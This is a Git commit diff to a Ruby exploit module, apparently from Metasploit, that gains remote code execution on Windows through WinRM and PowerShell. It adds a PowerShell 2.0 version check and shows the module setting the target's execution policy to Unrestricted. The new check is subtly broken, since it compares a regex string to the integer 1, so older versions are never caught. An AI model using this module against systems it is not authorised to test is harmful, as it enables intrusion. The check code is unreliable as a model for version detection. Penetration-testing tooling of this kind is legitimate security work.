Add check for propper powershell version

David Maloney · David Maloney · commit 355bdbfa394d · 2012-11-02T09:33:28.000-05:00
diff --git a/modules/exploits/windows/winrm/winrm_powershell.rb b/modules/exploits/windows/winrm/winrm_powershell.rb
@@ -28,6 +28,8 @@ def initialize(info = {})
 					automigrate before the WinRS shell dies.
 
 					It is important to use an x64 payload if your target system is x64.
+					The target machine must be running Powershell 2.0 for the payload 
+					to work. 
 			},
 			'Author'         => [ 'thelightcosine' ],
 			'License'        => MSF_LICENSE,
@@ -43,7 +45,7 @@ def initialize(info = {})
 			'Arch'          => [ ARCH_X86, ARCH_X86_64 ],
 			'Targets'        =>
 				[
-					[ 'Windows with Powershell', { } ],
+					[ 'Windows with Powershell 2.0', { } ],
 				],
 			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Nov 01 2012'
@@ -58,6 +60,25 @@ def check
 			return Msf::Exploit::CheckCode::Safe
 		end
 
+		print_status "checking for Powershell 2.0"
+		streams = winrm_run_cmd("powershell Get-Host")
+		if streams == 401
+			print_error "Login failed!"
+			return Msf::Exploit::CheckCode::Safe
+		end
+		unless streams.class == Hash 
+			print_error "Recieved error while running check"
+			return Msf::Exploit::CheckCode::Safe
+		end
+		streams['stdout'].each_line do |line|
+			next unless line.start_with? "Version"
+			major_version = line.match(/\d(?=\.)/)[0]
+			if major_version == 1
+				print_error "The target is running an older version of powershell"
+				return Msf::Exploit::CheckCode::Safe
+			end
+		end
+
 		streams = winrm_run_cmd("powershell Set-ExecutionPolicy Unrestricted")
 		if streams == 401
 			print_error "Login failed!"
